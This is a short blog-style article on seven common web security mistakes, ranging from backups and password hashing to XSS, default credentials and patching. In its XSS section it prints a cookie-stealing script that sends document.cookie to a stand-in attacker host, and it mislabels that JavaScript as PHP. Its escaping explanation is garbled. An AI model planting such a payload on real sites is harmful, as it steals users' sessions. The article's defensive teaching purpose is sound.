Whether you’re building a website, application or server, make sure you don’t make these security mistakes on your next project.
1. Insufficient Backups
Backups are a crucial part of running a anything online. They preserve your data in the event of a system crash or user error, and they can also save you from security threats. If you make backups that you rarely check, or you have a backup system in place that’s never been tested, you need to fix that immediately. You do not want to use your backup system for the first time when user data and your reputation are on the line.
For a successful backup, follow the “3-2-1” rule: three copies of all data, stored on two different storage media, with one in a remote location. Your hosting provider likely already provides some backups, but you’ll backups that you control as well.
2. Improperly Managed Passwords
You might think that, in 2017, no one would be storing passwords in plain text. And yet, it still happens. If you’re going to have user accounts, and you’re going to write your own password system, you need to use a tested encryption method. Obviously, this precludes plain text, but it also includes non-secure hashing algorithms like MD5. User passwords should be stored on the server as salted hashes, nothing else. Here’s some tips on how to store passwords properly.
3. Unvalidated User Input Vulnerabilities
Ever since the dawn of Web 2.0, online applications have rule the web. And any web application relies on user input to function. Unfortunately, you also must assume that at least one of your users will be malicious. User input becomes a security issue when malicious users upload computer code as a blog comment or status update. If you don’t protect against this attack, your website will then dutifully execute this code, allowing attackers to run arbitrary code on your website. To avoid this, you need to properly validate user input to only accept valid inputs. You also need to escape user content to break any uploaded code before it can execute.
4. Cross-Site Scripting Attacks
One special type of user input vulnerability is a cross site scripting attack, or XSS attack. In this attack, a malicious user uploads a script to your website. This code then executes on other users’ computers, siphoning data to hackers. Take the PHP script below, for example:
<script> document.location = 'http://www.hacker.net/cookie.php?' + document.cookie; </script>
If a used uploaded to this a forum, for example, it would execute on in the browsers of other users, grabbing their login cookies and passing them along to attackers. To help circumvent this attack vector, encode special characters as HTML entities. For example, <
and >
need to be covered to <
and >
, breaking any code between them. That won’t give you perfect protection against an XSS attack, but it’s a good start.
5. Storing Credit Card Information Yourself
Is it possible that you could write a perfectly secure credit card storage system yourself? Of course! But it’s far more likely that hackers will find a small mistake you made, exploit it thoroughly, and make off with tons of credit card information, leaving your company on the hook in a major way. Less likely, but potentially as disastrous, would be running afoul of the strict and obscure PCI regulations that govern storing and processing credit information.
In short, don’t implement your own credit card storage or processing systems. It’s far safer to rely on third party vendors like Authorize.net, Stripe or one of VISA’s certified service providers to handle these transactions. The monthly fee you’ll pay is well worth the peace of mind and built-in PCI compliance.
6. Keeping Default Usernames and Passwords
It’s crucial that you change the default user names and passwords for any hardware or software that you use to run your website. This should be second nature for any tech-savvy professional, but unfortunately it’s not. When changing the default information is cumbersome and the data accessed by the application “doesn’t matter,” it’s easy to talk yourself into keeping default settings for convenience. Hackers rely on this, and often have a database of known default passwords for a wide variety of applications. If they’re attempting to comprise your site, they’ll try all the default WordPress logins, for example, to see if one clicks. Don’t fall into this trap: change your account and password immediately after implementing a new package.
7. Ignoring Patches
New vulnerabilities are found constantly, and software is updated regularly to fix them. But it can be easy to miss these updates, especially when they’re not automatic. That’s why Microsoft recently took the controversial route of forcing Windows 10 updates on users: they’d rather annoy power users than leave millions of innocent but ignorant users vulnerable. If you’re managing servers, you need to be diligent about finding and installing updates for any software you run. Follow vendor websites, sign up for email lists and turn on notifications, because once an attack becomes widespread, you want to be protected against it.
Conclusion: Do Your Research
When you’re working on a new project, you need to be sure that you’re covering all the necessary security holes. Do your research and make sure you’re not making rookie mistakes.
You might also like: